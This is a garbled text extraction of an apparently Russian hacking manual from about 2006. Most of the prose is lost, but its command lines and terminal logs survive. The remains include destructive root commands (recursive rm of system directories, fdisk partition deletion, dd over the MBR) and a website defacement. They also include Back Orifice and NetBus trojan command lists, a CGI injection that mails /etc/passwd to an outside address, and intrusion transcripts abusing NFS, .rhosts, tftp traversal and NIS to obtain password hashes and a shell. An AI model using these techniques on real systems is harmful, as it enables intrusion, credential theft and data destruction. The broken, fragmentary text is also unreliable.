levin m. haking 1

8/7/2019 Levin M. Haking 1

1/112

:

681.3 32.973.26018.2

363

., 2006

,2006

.363 :

. .: , 2006. 224 .

.

681.3 32.973.26018.2

2006


2/112

, .

, , , .

,

(, TCP/IP). .

?

!

.

:

Linux

RedHat

UNIX SlackWare

UNIX

FreeBSD , UNIX

: Linux BSD (FreeBSD,OpenBSD, NetBSD)? .

.

, :

ftp 21

telnet 23

smtp 25

http 80

pop3 110

3 4


3/112

.

, :FTP (21)

, FTP, , .

FTP? File Transfer Protocol( ). , FTP , 21 , , .

TELNET (23)

, ( ), .

telnet ? , (!) ( !) .

SMTP (25)

, ,

? ,

. Simple Mail Transfer Protocol .

HTTP (80)

Hyper Text Transfer Protocol .

, , , Internet.

web, ( ) . , .

, ! , web .

POP3 (110)

MailAgent (, Microsoft Outlook).

() .

5 6


4/112

? ,

UNIX . ( ) UNIX.

Windows (MUST_DIE), (A, B, C,D) :

C:\MUST_DIE\die.com

UNIX /, ( CDROM) (,/cdrom).

. .

.

/etc. () /etc passwd .. /etc/passwd.

, , ,

, .

, !

, IP.

:tracert ( UNIX traceroute)

w3.cnn.com

( ) IP

(IP Internet. 195.55.55.55 ( 0255 .. 0255.0255.0255.0255).

ftp (

IP). ? MSDOS PROMPT MSDOS.

( ) login. Internet.

Password.

7 8


5/112

Internet.

( , , ! w3.dos.net IIS

(Internet Information Server), !

.

:

Directory /home/usr/_ not

foundLogging in "/"

, , .

:

ftp> ( ) get /etc/passwd

.? . , find MUST_DIE passwd (). ,

ftp (.. MUST_DIE). , find.

, . , , , !

,

! :

, .

?

IP . , , . , .

: ? ,

9 10


6/112

Internet. TCP/IP (Transfer ControlProtocol/Internet Protocol) ,

Internet. .

Internet, IP (, ppp10335.dialup.glasnet.ru). ( ) , . ,

, IP:port ( , 195.34.34.30:21 , FTP zone.ru).

, ,

23 ( telnet) ( telnet ip:port. , 23). , .

/, . ,

, , .

23 , ,

. .

( ). 273275 , , , ,

:

, Internet. , . . , .

11 12


7/112

( 19).

, , .

, .

(Finger).

finger , , , .

,

? 1 1024 (wellknown). , services. Windows

C:\_Windows\SERVICES\. NT C:\WINNT\SYSTEM32\DRIVERS\ETC\SERVICES. /etc/services/

( , ). , (WWW, mail,FTP, news, telnet). , SMTP

25 ,POP3 110 , WWW 80 , FTP 21

, ,

. ! , ( ) , .

, , , ( ,

Internet !).

13 14


8/112

.

.

, ?

, . . ,

sendmail ( wiz debug FTP, ).

, , .

Windows

.

, Internet. , .

. , , . . , ++,

(root) , !!! FTPBounce , , FTP( / / ) ,

. ( ). ,

15 16


9/112

FTP ,

. ( ). ,

( !).

, ( !), . ,

: NT, VMS UNIX. UNIX BSD, AIX, SCI, Sun OS, Irix () .

, , NT, UNIX, Sun OS (, ).

,

, , .

. , ?

,

netstat a ( ) :

Active Connections

Proto Local Address

Foreign Address State

TCP localhost:1027

0.0.0.0:0 LISTENINGTCP localhost:135

0.0.0.0:0 LISTENING

TCP localhost:135

0.0.0.0:0 LISTENING

TCP localhost:1026

0.0.0.0:0 LISTENING

TCP localhost:1026

localhost:1027 ESTABLISHED

TCP localhost:1027


TCP localhost:137

0.0.0.0:0 LISTENING

TCP localhost:138

17 18


10/112

0.0.0.0:0 LISTENING

TCP localhost:nbsession

0.0.0.0:0 LISTENING

UDP localhost:135 *:*UDP localhost:nbname *:*

UDP localhost:nbdatagram *:*

. , .

, Local Address () 135, 137, 138 nbsession ( 139 netstatan, , .

MicrosoftNetworking LAN ( ). Internet , www.uxx.com, , www.happyhacker.org. ( www.whitehouse.gov). netstat a :

Active Connections

Proto Local Address Foreign

Address State

TCP localhost:1027

0.0.0.0:0 LISTENING

TCP localhost:1350.0.0.0:0 LISTENING

TCP localhost:135

0.0.0.0:0 LISTENING

TCP localhost:2508

0.0.0.0:0 LISTENING

TCP localhost:25090.0.0.0:0 LISTENING

TCP localhost:2510

0.0.0.0:0 LISTENING

TCP localhost:2511

0.0.0.0:0 LISTENING

TCP localhost:2514

0.0.0.0:0 LISTENINGTCP localhost:1026

0.0.0.0:0 LISTENING

TCP localhost:1026


TCP localhost:1027

localhost:1026 ESTABLISHEDTCP localhost:137

0.0.0.0:0 LISTENING

TCP localhost:138

0.0.0.0:0 LISTENING

TCP localhost:139

0.0.0.0:0 LISTENING

19 20


11/112

TCP localhost:2508

zlliks.505.ORG:80 ESTABLISHED

TCP localhost:2509

zlliks.505.ORG:80 ESTABLISHEDTCP localhost:2510


TCP localhost:2511


TCP localhost:2514

whitehouse.gov:telnet ESTABLISHED

, . , , 4 zllinks.505.ORG 80 whitehouse.gov . , Internet.

www.happyhacker.org (zlliks.505.ORG). , 1024??? , , , . ,

,

1024 . ? , 2508 2511.

? Internet () netstat r. :

Route Table

Active Routes:

Network Address Netmask Gateway

Address Interface Metric

0.0.0.0 0.0.0.0

198.59.999.200 198.59.999.200 1

127.0.0.0 255.0.0.0127.0.0.1 127.0.0.1

1

198.59.999.0 255.255.255.0

198.59.999.200 198.59.999.200 1

198.59.999.200 255.255.255.255

127.0.0.1 127.0.0.1

1

198.59.999.255 255.255.255.255

198.59.999.200 198.59.999.200 1

224.0.0.0 224.0.0.0

198.59.999.200 198.59.999.200 1

255.255.255.255 255.255.255.255

198.59.999.200 0.0.0.0

21 22


12/112

1

Active Connections

Proto Local Address

Foreign Address StateTCP lovelylady:1093

mack.foo66.com:smtp ESTABLISHED

Gateway Address Interface IP ( IP , ). ,

, 10 , , , ( ) , ( ).

, Internet . p: . ? . .

e

mail UUPC . online

offline . init init1 \UUPC. login password. . Ho ,

.

usera , login:.

.

, Netscape, SLIP & PPP, ,

y , . , . transmit . , , Windows.

23 24


13/112

, :

.pwl. Windows . . , DES. Ho . ,

.pwl , 1,2,3,4 , , .

,

. , . . . ,

. BBS, . ! Ha 100%. login, password. , .

,

. yp ( )

. .

login/passwd,

. root . Ho . , , .

UNIX:FreeBSD, BSDI, SCO open server, Linux., , NexStep, UnixWare, Solaris,Aix, HPUX, VAXORX5.12. , Xenix. Ho

, , AT&T UNIX 1971 . UNIX:

25 26


14/112


15/112

(daemon) .

exploit:

ftp wuftp2.42; wuftp2.60 qpopper proftp . exploit

openSource ( ), ++.

UNIX. exploit ( ) UNIX wuftp2.42 ( root):

#gcc .

#./a.out

( )

IP , offset , ,

() (

5000 +5000 +100, .. : 5000 4900

4800 0 100 200 5000).

, . , ,

(patch) , (bugs) .

, .

root?Root

. Root , root (superuser), , !

root? root (, , , ).

29 30


16/112

? exploit. ,

exploit. ? , C++, , , .

() exploit remote access ( ), ..

exploit ( , ) remoteaccess.

?

, ( ), ?

1. (,).

2. .

3. , .

, . : /etc (

), ftpusers ( BSDI UNIX), default () root 21

(ftp) . joe ( ) root ftp.

? root #, (Ctrl+k,

x).

( root):

#joe /etc/ftpusers

root #, Ctrl+k, x.

, , ( ?).

, root , root

, ( ) , !

:

#ftp ip_address or host_name

31 32


17/112

login: root

password: !

!

root ! ( , )

? ! exploit!

:

login incorrect

1 1.000.000 ( ), , () .

exploit( , root). :

#passwd

:

New unix passwd:

( ) 12345

:

Unix password too weak, please

retype password:

?

, UNIX MUST_DIE!

: Abc04k9834z

? !

, , ! ,

! , () ZRHEN.

12345 :

Retype password:

12345

, ! FTP.

#ftp

ftp>open ip_address or host_name

( ,

33 34


18/112

, )

login: root

password: 12345

! ( , ? WWW !)

ftp bye:

ftp>bye

.

ftp, ?

!

telnet ( 23), .

exploit

, :#telnet 127.0.0.1 80

127.0.0.1 loopback .. ip; 80 HTTP (Hyper

Text Transfer Protocol) , , :

we hack you

, ( , ?).

, , .. . , !

?

!

?

()

: , apache ( web). :

#which apache

:

/usr/sbin/apachectl

35 36


19/112

/usr/local/sbin/apachectl

, , , , DocumentRoot(httpd.conf). :

/usr/etc/apache

/usr/local/etc/apache

( ) apache DocumentRott(home_dir) :

/www

/home/www

/usr/local/www

:

#cd home_dir home_dir www. index.htm index.html. ?

:

#ls full | more

(www). :

#rm index.htm (index.html)

.

:

#joe index.htm (index.html)

( joe) :

This site hacked by Vasya

Ctrl+k, x.

joe .

! UNIX

, . , Internet:

Ftpd (ftp daemon) port 21 Telnetd (telnet daemon) port 23 Smtpd (smtp daemon) port 25 Httpd (http daemon) port 80 Pop3d (pop3 daemon) port 110

37 38


20/112

. ( roota) :

#killall httpd

web .

#killall ftpd

ftp .

, :

( roota):

#httpd start ( Linux)

#apachectl restart ( FreeBSD

web

apache)

ftpd:

#ftpd ( !)

. . , ( roota):

#cd /

#rm * ( (!)

)

#cd /boot

#rm *

#cd /bin

#rm *#cd /sbin

#rm *

#cd /usr/bin

#rm *

#cd /usr/sbin

#rm *

, ( /etc, ).

, .. rm

: /bin /sbin /usr/bin /usr/sbin ,

( rm ). :

#which rm

39 40


21/112

, rm. .

?

:

#cd /etc

#rm *

!

:

#reboot

( )

, 100%

? ( roota):

#fdisk

p ( . (, 4), :

d (enter), 4 (enter)




w nter.

! !( !)

UNIX dd, ( )., . SlackWare:

:hda1 slack ; hda2 dos ; hdc2

slack

( , DOS, , MBR (Master Boot Record)

hdc2 (SlackWare). UNIX ? ! ):

dd /dev/hda /dev/hdc 0 512

:

512 . 512 ?Master Boot Record (MBR).

41 42


22/112

512 ( )

???

dd () hda hdc!

hdc!

, Ctrl+, dd. dd 20

8 , Internet 2

: dd fdisk.

, ( ).

99%

(), () ! (

() .

() ( portscanner):

#portscanner 55.55.55.55 1 1024

55.55.55.55 IP ; 1

;1024 .

( n ) ( ):

21

2225

80

110

:

43 44


23/112


24/112

Count.dat .

2. : (, ):

Count.cgi 755. ..#chmod count.cgi 755

Count.cgi 777. ..#chmod count.dat 777

telnet , ftp , ftp, chmod ftp.

count.cgi:

#!/usr/bin/perl

print "Contenttype: text/html\n\n";

open (file,"count.dat);

@dat=;

close (file);

$dat[0]++;

open (file,">count.dat");

print "$dat[0]\n";

close (file);

print " $dat[0]\n";

count.dat ( 5).

! , count.cgi 1.

CGI

( ) .. CGI ! ( ,.. , ), : .

( , )

( email ). email :

cat /etc/passwd

47 48


25/112

cat /etc/master.passwd

cat /etc/shadow

(). , , .

:

Root:fdkjhgSFDgf:

( john the ripper) .:

.

, .

? , () () .

,

, , , .

, () , () .

? () .core.

? , , , , .

, realnetworks ( realaudio/realvideo). ,

UIN: Bugs, Crack

Social Ingineering

:

, 49 50


26/112

UIN ,

, . , .

: Internet

, . . C:\ . ICQ. UIN 20xxxx 80xxxxx. C:\Program Files\ICQ\UIN number.uin , , e

mail . , keyboard sniffer , .

ICQ Low, Medium High.

. ,

, ICQ. ( , ). UIN , , , reboot, ,

ICQ , keyboard sniffer . .

,

: , sniffer .

, ? ,

?

,

, UIN 51 52


27/112

http://www.icq.com/password/ ICQ

email .

UIN

email.

. , POP3Password Crack

. , . , hotmail.com , email , .

: ICQ 777777.

UIN! email, [email protected]. UIN , 2 . sometihg.com email , . , email

777777. ,

: email .

(: email , web ), web.

53 54


28/112

[email protected]? ,

( email ) [email protected]. . , :

, . . , , . , 80% , ,

.

. UIN , email .

,

, ICQ 8 . Windows UIN .

Linux, , , password, ( ,

root ).

Linux ICQ , UIN

55 56


29/112

9, . ?

UINa. Linux ICQ , .

ICQ ,

: ICQ email?

: , ICQ

ICQhijeck. IP, UINa ICQhijeck spoofed , , .

.

, .

: , . ICQ?

: . , , ICQsniff , ICQ . , ,

, . , , , , , , , .

: ICQhijeck,ICQsniff, keyboard sniffer, TCP/UDP sniffer

57 58


30/112

, ?

:

Private Bug, . , , ICQ, .

tools ? , , . .

. ,

, , www.yahoo.com. .

,

, UIN ,

ICQ.

, , , ICQ

.

, ICQ , Windows. ,

www.icq.com ICQ, . , .

. web .

free emeil, freewebhosting . , email, .

59 60


31/112

, , , email

ICQ .

, , .

.

Internet , , ,

. ,

ICQ ,

. , ICQ ? ,

Internet

.

, Nuke 139, http://www.microsoft.com .

Internet , , Proxy , , http://www.gin.ru.

:http://www.teamcti.com/pview/PrcView.zip, ,

61 62


32/112

: RUN Windows 95/98

: regedit Windows(For Lamers). HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run. , , Internet ! , !

, sharin ssl

, cgi , .

()

(

) :

1.

, , C++, Visual C++, Delphi, , 16 32

( Windows95/98)

2. , . , . , , .

1

!!! !!! ? , , 2

, http://www.microsoft.com.

:

1. 1632 :

63 64


33/112


34/112

.

. . , !!! NeoLite,

:http://www.neoworx.com. .

2. , , , !!! ! 2 1!

Back

Orifice

BO 4

. , 4 .:

BoServ.exe

.

, . Windows

. (, PrcView) .exe. Bo. Windows\system\windll.dll,

Bo.

BoGui.exe

.

.

BoConfig.exe

, BoServ.exe .

, , ..

BoClient.exe

, BoGui.exe,

67 68


35/112

Target host:port

, BO. , , 31337.

:

Directory creat

().

Directory list

Directory remove

Export add sharing

Export delete

sharing

Export list

sharing

File copy

File delete

File find

File view

HTTP enable

HTTP

HTTP disable

HTTP

Key log begin

Key log end

MM capture avi

.avi

MM capture frame

frame

MM capture screen

Screen Shot c

69 70


36/112

MM list capture device

MM play sound

Net connections

Net delete

Net use

Net view

Ping host

Bo

Process kill

Process list

Process spawn

Reg

Windows System dialog box

System info

System lockup

System passwords

System reboot

.

!

NetBus

Net Bus

2 .patch.exe

. ,.. , .

71 72


37/112

Netbus.exe

.

Net Bus:

Host name/IP

Port

, 12345

Serevr admin

. , ..

Open CDROM

CDROM

Show image

Swap mouse

Start program

Msg manager

Screendump

Screen Shot

Get info

Play sound

Exit Windows

Send text

Active winds

Mouse pos

Listen

OnLine, Ctrl+Esc,Alt+ Tab ..

Sound system

73 74


38/112

Server setup

patch.exe

Control mouse

Go to URL

URL

Key manager

File manager

( )

,

Net Bus Users & Lamers. patch.exe . Back Orifice .

. . Internet

Back Orifice

Back Orifice Eliminator ,

BO!!! IP , BO Server,

Net Bus

Net Buster , Net Bus!!! IP , patch.exe (, , ),

c:\. 1000 .

IP ICQ?

icqs.exe. icqs.rar.

75 76


39/112

?

,

, , , , , ,,

, , , .

IP Internet . ,

, http://www.yandex.ru, .. ,, email ( Guest Book`s,, IP

). , IP, , , , , , , IP,

, IP,

, .. ( )

( ), Internet , . .

, Internet , ,

., , .

77 78

l it t / d


40/112

exploit, , , .

, , , ( ?), , , exploit

, , . , , .

.

. , , .

, !

? ! . . , , . Internet( ). !

etc/passwd

RU.HACKER RU.NETHACK

: etc/passwd? , ?

, , ,

, , . , , , , .

? , , , , . , ! ! ! http://kpnc.webprovider.com/hack.pl, etc/passwd , .

79 80

! ( demo Demo User


41/112

, ! ( , Netscape, ;

IE 4.0 (5.0) , , etc/passwd , , ,, , ).

:

DISPLAY ETC/PASSWORD FILE

LOGIN NAME DIR

root System Administrator /root

toor System Administrator /rootdaemon System Daemon /

sys Operating System /tmp

bin BSDI Software

/usr/bsdi

operator System Operator

/usr/opr

uucp UNIXtoUNIX Copy

/var/spool/uucppublic

games Games Pseudouser

/usr/games

news USENET News,,,

/var/news/etc

demo Demo User

/usr/demo

mail Sendmail

/var/spool/mail

brian Brian Atkins,,,

/export/home/brian

kannada Narendra Tumkur

/disk1/k/kannada

pumpkin2 liao xin

/disk1/p/pumpkin2

lost508 no idea/disk1/l/lost508

essepi Salvatore Calarco

/disk1/e/essepi

rajatbhasin Rajat Bhasin

/disk1/r/rajatbhasin

panze Congo Koa/disk1/p/panze

goni1 Naseer Bhatti

/disk1/g/goni1

madmama patty noland

/disk1/m/madmama

yccwp yang changchun

/disk1/y/yccwp

. , . .

81 82


42/112

, .

,

, , , , , , . , , ,

:LOGIN NAME DIR

demo Demo User /usr/demo

. ,

?

?

? , . , , , !

? ? , ,

(, )!

, ,

. nethackk1.htm ( HTML) :

etc/pasw ?

83 84


43/112

HTML, , , , hack.pl.

? html? , hack.pl. , . hack.pl ? , ,

?

, , ! ,

. , , madmama. ?

madmama.webprovider.com ?

Index of /

Name Last modified Size

Description

[DIR] Parent Directory 09Oct1999

11:10

[DIR] _private/ 09Oct1999 11:30

[TXT] form.html 09Oct1999 12:26 1k

[DIR] images/ 09Oct1999 11:30

[TXT] irc.html 09Oct1999 12:21 0k

[TXT] mamairc.html 09Oct1999 12:18

4k

[TXT] postinfo.html 09Oct1999 11:30

2k

[TXT] thank_you.html 09Oct1999

12:26 1k ! _private.

, ? . , !

, , !

, . madmama , !!!

? , dbf prices. ,

85 86

c


44/112

c. , . ! ,

!

, , ? , ? , ,

( ). . Etc/password , ( ) . ! Etc/password

!

etc/password ,

., ,

, .

, . ,

, :news USENET News,,, /var/news/etc

( , ,NetInfo), c , .

, , , . POP3 ( ), SMTP ( ).

, etc/password! ? ftp (, ).

ftp://ftp.werbprovider.com . , .

, WWW FTP

87 88

, UNIX


45/112

, . etc/password

( ) .

?

UNIX UNIX , UNIX, , ,

, .

Red Hat Black Cat , UNIX hobbiton.org ( , telnethobbiton.org 'newuser').

,

UNIX

, . , , , . , , !

, UNIX, . , , , UNIX,

. UNIX

Mortal Commander ( NortonCommander)

Windows. UNIX, . Mortal Commander .

89 90


46/112

LINUX bash


47/112

.

, , .

.

(, , TC, TENEX PDP10).

. ,

, . AT&T System V, .

, , GNU, bash Borne AgainShell.

,

CShell . , , .

, , , ( )., , .

cat /etc/shells, UWIN :

cat /etc/shells

/usr/bin/ksh

/usr/bin/sh/usr/bin/tcsh

/usr/bin/csh

/bin/sh

/bin/ksh

/bin/csh

/bin/tcsh

93 94

,


48/112

(, ), .

exit. . (

/usr/bin /bin

, ).

$ echo $SHELL/usr/bin/ksh

$ /usr/bin/sh

# echo $SHELL

/usr/bin/ksh

# exit$ /usr/bin/tcsh

# echo $SHELL

/usr/bin/ksh

# exit

$ /usr/bin/csh

%echo $SHELL

/usr/bin/ksh

%exit

command.com (MSDOS) dir, UNIX

.

, . UNIX ls, /bin. , CYGWIN

, fileutils.tar.gz .

,

ls /.ls /

A E proc

base.bat etc reg

baseserviceslink.sh F sys

bin H tmp

C home usrD lib var

dev linka win

, /etc , ls:

95 96

$ ls /etc , ,


49/112

crontab inetdconfig.sh passwd.add

traceit

in.ftpd init.exe priv.exe

tracer.exe

in.rlogind login.allow profile

ucs.exe

in.rshd login.deny rc ums.exe

in.telnetd mailx.rc services

inetd.conf mkpasswd.exe shells

inetd.exe passwd stop_uwin

? , ? ? ., , web. Java VisualBasic. , , ,

. , .

, HTML. HTML

. HTML ., , , Java . . .

? ,

. ..

, , ,

( ) . , , . ,

, (, , ).

, .

97 98

CGI BIN

, ?


50/112

CGIBIN. , . exe BackOrifice2000., . ,

, PentiumPro Windows NT, .

, . DEC Alpha UNIX.

, ? . , .

NT. Perl , UNIX, NT. , , . , .

? PL!, Perl. , ! , Perl! , .

! .

, .

(, www.agava.ru). ?

, , . !

! , , , , , .

, www cgibin

99 100

, !

VirtualAve

20


51/112

, , , !

, , , !

,

CGI CGI , , .

. ?

, , Internet ! , , ! , CGI+Free+Perl , .

, , , .

20 . cgibin,

Perl. sendmail,

( ).

,

http://yourname.virtualave.net/. FTP,

(, ftp://server26.virtual.ave). .

. ., . , . , .

Hypermart

10 ( ), , Perl .

101 102

,

Webjump

25


52/112

.

, http://yourname.hypermart.net/., , http://server26.hypermart.net/ kpnc .

FTP, , , .

, , email. email , . , , ZMAIL.RU TELEMEDNET.RU. , .

25 CGIBIN, () , Perl , .

, , , ( ) !

ProHosting

,

. . .

JustFree

cgibin . ,

, , .

103 104

!

, FTP WWW


53/112

, ,

. , . , , , ,

!

., , FTP. FTP,

. , FAR.

FTP.

, ( , ).

FTP WWW, !

. Enter . , , , . !

, , , Norton Commander, , .

? , /CGIBIN, ! ! . , . HyperMart , Virualave /public_html. , . Perl. , .

105 106


54/112

/var/news/etc

demo Demo User

nonroot Nonroot root user for

NFS/nonexistent


55/112

demo Demo User

/usr/demo

mail Sendmail

/var/spool/mail

brian Brian Atkins,,,

/export/home/brian

alias ,,,

/var/qmail/alias

qmaild ,,,

/var/qmailqmaill ,,,

/var/qmail

qmailp ,,,

/var/qmail

qmailq ,,,

/var/qmail

qmailr ,,,

/var/qmail

qmails ,,,

/var/qmail

ftp FTP Daemon,,,

/var/spool/ftp

proftp FTP Daemon,,,/var/spool/ftp

www Publish Account,,,

/usr/home/www

nobody Unprivileged user

/nonexistent

NFS/nonexistent

hmvbin 6553666559 reserved for

hmv/nonexistent

! !(, demo). , ? , ,, , .

, , , .

1

. , .

! !

2

, , , , .

109 110

( ) ! ? ,

3


56/112

? , .

, , . , , ( ), , ( web , ).

|mail [email protected]


57/112

href=http://kpnc.id.ru>PRO

HACK
";

print "DISPLAY ETC/PASSWD FILE \n";print "";

print "";

print " LOGIN";

print " NAME";

print " DIR";

open(PASS, "


58/112

EP/IX

/etc/shadow

HPUX

/.secure/etc/passwd

IRIX 5

/etc/shadow

Linux 1.1

/etc/shadowOSF/1

/etc/passwd[.dir|.pag]

SCO Unix #.2.x

/tcb/auth/files//

SunOS4.1+c2

/etc/security/passwd.adjunct

SunOS 5.0

/etc/shadow

System V Release 4.0/etc/shadow

System V Release 4.2

/etc/security/

databaseUltrix 4

/etc/auth[.dir|.pag]

? .

open(PASS, "


59/112

. ( )., , ,

. . .

? , : finger, rusers,showmount, rpcinfo, dns, ftp, sendmail .

. ?

allias, nameserver , . nslookup.

# g @

[www.xxx.xxxx.su]

Login NameTTY Idle When

Office

kuzmenko Vladimir Kizmenko p0

4:57 Sun 08:25

kuzmenko Vladimir Kizmenko p1

2:38 Sun 08:26

milichen Yuri Mulichenko p44:59 Fri 19:41 3B/r410 13513

sherbak Eugeny Scherbkov p5

5:00 Sat 10:18 221/r448 17733

devil# finger [email protected]

[ccsix.xxxx.xxxx.ru]Login: yur

Name: Yuri A. Podgorodsky

Directory: /home/yur

Shell: /bin/bash

On since Sat Apr 12 12:24 (MSK) on

ttyp0 from jannet.xxxx.xxxx3 hours 35 minutes idle

Mail forwarded to

[email protected]

No mail.

No Plan.

devil# rusers l unisun.xxxxxxxx.net

117 118

Login Name

TTY When Idle

unknown

100000 2 udp

0 0 0 0 0


60/112

Host

lavrov unisun.xxxxx

xxx:console Apr 2 10:32 17:37suh unisun.xxxxx

xxx:ttyp0 Apr 5 10:20

17:32 (mskws.desy.de)

lavrov unisun.xxxxx


25:55 (:0.0)lavrov unisun.xxxxx


97:11 (:0.0)

,

, shell , . Idle, , .

2. rpcinfodevil# rpcinfo sun10.xxx.xxx.su

program version netid address

service owner

100000 2 tcp

0.0.0.0.0.111 rpcbind

0.0.0.0.0.111 rpcbind

unknown

100004 2 udp0.0.0.0.2.150 ypserv

unknown

100004 2 tcp

0.0.0.0.2.151 ypserv

unknown

100004 1 udp0.0.0.0.2.150 ypserv

unknown

100004 1 tcp

0.0.0.0.2.151 ypserv

unknown

100069 1 udp

0.0.0.0.2.152

unknown

100069 1 tcp

0.0.0.0.2.154

unknown

100007 2 tcp

0.0.0.0.4.0 ypbindunknown

100007 2 udp

0.0.0.0.4.3 ypbind

unknown

100007 1 tcp

119 120

0.0.0.0.4.0 ypbind

unknown

100007 1 d

100005 2 tcp

0.0.0.0.2.226 mountd

k


61/112

100007 1 udp

0.0.0.0.4.3 ypbind

unknown100028 1 tcp

0.0.0.0.2.156 ypupdated

unknown

100028 1 udp

0.0.0.0.2.158 ypupdated

unknown100009 1 udp

0.0.0.0.3.255 yppasswdd

unknown

100029 1 udp

0.0.0.0.2.159 keyserv

unknown

100003 2 udp0.0.0.0.8.1 nfs

unknown

100005 1 udp

0.0.0.0.2.223 mountd

unknown

100005 2 udp0.0.0.0.2.223 mountd

unknown

100005 1 tcp

0.0.0.0.2.226 mountd

unknown

unknown

100024 1 udp

0.0.0.0.2.226 statusunknown

100024 1 tcp

0.0.0.0.2.228 status

unknown

100021 1 tcp

0.0.0.0.2.229 nlockmgrunknown

rpcinfo RPC . mountd, nisd, ypserv ypbind, statd, bootparam, pcnfsd, rexd. statd .pcnfsd mountd , rexd .

3. NIS (nisd, ypbind, ypserv).

NIS

, NIS NIS rpc . :

devil# ypx dg sun10.xxx.xxx.su

121 122

Trying domain sun10.xxx.xxx.su

Trying domain sun10

Trying domain xxx xxx su

YP map transfer successfull.


62/112

Trying domain xxx.xxx.su

sysdiag:*:0:1:Old System

Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag

sundiag:*:0:1:System

Diagnostic:/usr/diag/sundiag:/usr/diag

/

sundiag/sundiag

sybase:*:13:55:syb:/usr/nms/sybase:/bin/csh

nobody:*:65534:65534::/:

daemon:*:1:1::/:

audit:*:9:9::/etc/security/audit:/bin/

csh

uucp:*:4:8::/var/spool/uucppublic:

sync:__F324VMRDcL6:1:1::/:/bin/syncroot:__Ye.Ibw.8uQg:0:3:Operator:/:/bin

/csh

news:*:6:6::/var/spool/news:/bin/csh

sys:*:2:2::/:/bin/csh

snm:__7ck.pfEh/2s:11:11:Network

Manager:/usr/snm:/bin/cshrom:__IriAsoksSeE:10:10:Victor

Romanchik:/usr/rom:/bin/csh

nms:*:12:55:Network

Manager:/usr/nms:/bin/csh

bin:*:3:3::/bin:

__ .

NIS , bootparam /var/yp, .

4. showmountdevil# showmount e

thsun1.xxxx.xxxxx.su

export list for thsun1.xxxx.xxxxx.su:

/pub

(everyone)

/optthsun2,thsun3,tlx39

/pgm/linux

(everyone)

/export

(everyone)

/usr

(everyone)/tftpboot

(everyone)

/cdrom/sol_2_3_hw894_sparc/s0

(everyone)

/home

123 124

(everyone)

/scratch/users

(everyone)

512 Feb 14 11:16 lnp

drwxrxrx 6 root other

512 Feb 14 11:19 lnup


63/112

(everyone)

showmount , , . export, home, usr !

devil# mount F nfs

thsun1.xxxx.xxxxx.su:/home /mntdevil# cd /mnt

devil# ls al

total 12524

drwxrxrx 17 root root

1024 Jun 28 1996 .

drwxrxrx 28 root root1024 Apr 12 16:29 ..

drwxrxrx 2 root root

512 May 19 1995 TT_DB

drwxrxrx 3 root 798

512 Nov 25 1994 cfi

drwxrxrx 6 root 100

512 Nov 25 1994 dugdrwxrxrx 9 root other

512 Feb 17 11:19 lcta


512 Jun 19 1996 lhep


512 Feb 14 11:19 lnup


512 Jan 15 1995 lnurdevil# cd lnup

devil# ls al

total 12


512 Feb 14 11:19 .

drwxrxrx 17 root root1024 Jun 28 1996 ..

drwxrxrx 3 6000 600

512 Oct 30 1995 dolbilov

drwxrxrx 9 6190 600

1024 Oct 7 1996 davgun

drwxrxrx 4 6001 600

512 Oct 20 1995 gvfdrwxrxrx 4 6003 600

512 Apr 4 10:31 yup

devil# echo 'dolbilov::600:' >>

/etc/groups

devil# echo

'dolbilov:x:6000:600::/noway:/bin/csh'>> /etc/passwd

devil# su dolbilov

$ cd dolbilov

$ ls al

total 30

125 126

drwxrxrx 3 dolbilov dolbilov

512 Apr 12 16:21 .


220 www.xxx.ru ESMTP Sendmail

8.8.5/8.8.5; Sat, 12 Apr 1997

15:55:36 +0400


64/112

drwxr xr x 6 root other

512 Feb 14 11:19 ..

rwrr 1 dolbilov dolbilov2901 Apr 7 1993 .cshrc

rwrr 1 dolbilov dolbilov

1550 Apr 7 1993 .login

rwrr 1 dolbilov dolbilov

2750 Apr 7 1993 .rootmenu

rwrr 1 dolbilov dolbilov478 Apr 7 1993 .sunview

rw 1 dolbilov dolbilov

2196 Oct 30 1995 mbox

drwxrxrx 2 dolbilov dolbilov

512 Nov 25 1994 timezone

$ echo '+ +' > .rhosts

$ exitdevil# rsh l dolbilov

thsun1.xxxx.xxxxx.su /bin/csh i

$

shell .

5. sendmail

devil# telnet www.xxx.ru 25

Trying 193.124.xxx.xx

Connected to www.xxx.ru.

Escape character is '^]'.

15:55:36 +0400

vrfy serg

550 serg User unknownvrfy alex

250 Alexei E. Katov get

/tmp/../../../../../../../../../etc/pa

sswd /tmp/passwd

tftp> quit

127 128

devil#

7. ftp

Login failed.

ftp> quote pasv

421 Service not available, remote


65/112

ftp

, . . .

devil# ftp xxxxxxxxxxx.xxx.com

Connected to xxxxxxxxxxx.xxx.com.

220 xxxxxxxxxxx FTP server (UNIX(r)

System V Release 4.0) ready.

Name (xxxxxxxxxxx.xxx.com:root): ftp

331 Guest login ok, send ident as

password.Password:

230 Guest login ok, access

restrictions apply.

ftp> user root

530 User root unknown.

Login failed.ftp> user root

530 User root unknown.

Login failed.

ftp> user foobar

530 User foobar access denied.

421 Service not available, remote

server has closed connection

ftp> o xxxxxxxxxxx.xxx.comConnected to xxxxxxxxxxx.xxx.com.

220 xxxxxxxxxxx FTP server (UNIX(r)

System V Release 4.0) ready.

Name (xxxxxxxxxxx.xxx.com:root): ftp

331 Guest login ok, send ident as

password.Password:

230 Guest login ok, access

restrictions apply.

ftp> bin

200 Type set to I.

ftp> get core

200 PORT command successful.150 Binary data connection for core

(194...,51553)

(281136 bytes).

226 Binary Transfer complete.

local: core remote: core

281136 bytes received in 16 seconds(17 Kbytes/s)

ftp> bye

221 Goodbye.

devil#

/********** Fragment of core

129 130

************/

.994:..S.:.

srk: a2U/fw.FWhk:.::::..S

:


66/112

__ /

harat:__mQb7Pij8mrA:.::::..S@

kchu:__/sPKnswJ8y2:9.::::..S`yhew:__0/L6foNhPoA:9.:::: ..S.

:h6qh9see7ry .M:9353:.:.

pa ..S.WGZ/NEzsLjwe 2:9097::..

flo ..S.Xbra.0mg/PMc :9097:::.

dave ..S.0VnE0zICamE: 9097::::.

on:2 ..T.VqQO2BOU:909 7::::::..:/*************************************

***/

__.

7. rexd

devil# su daemon$ on i faxnetxx.xxx.ru /bin/sh i

$ uname a

faxnetxx faxnetxx 3.2 2 i386

$ id

uid=1(daemon) gid=1(other)

$8. .

rpc. .

X server

X 6000+ . magiccookies xhost +, ,

, (xspy, xpush). 6000 , denial_of_service .

rlogin talkd

, . rlogin TERM, talkd , . , . root.

131 132

rsh rexec

rsh rexec

, , NFS .


67/112

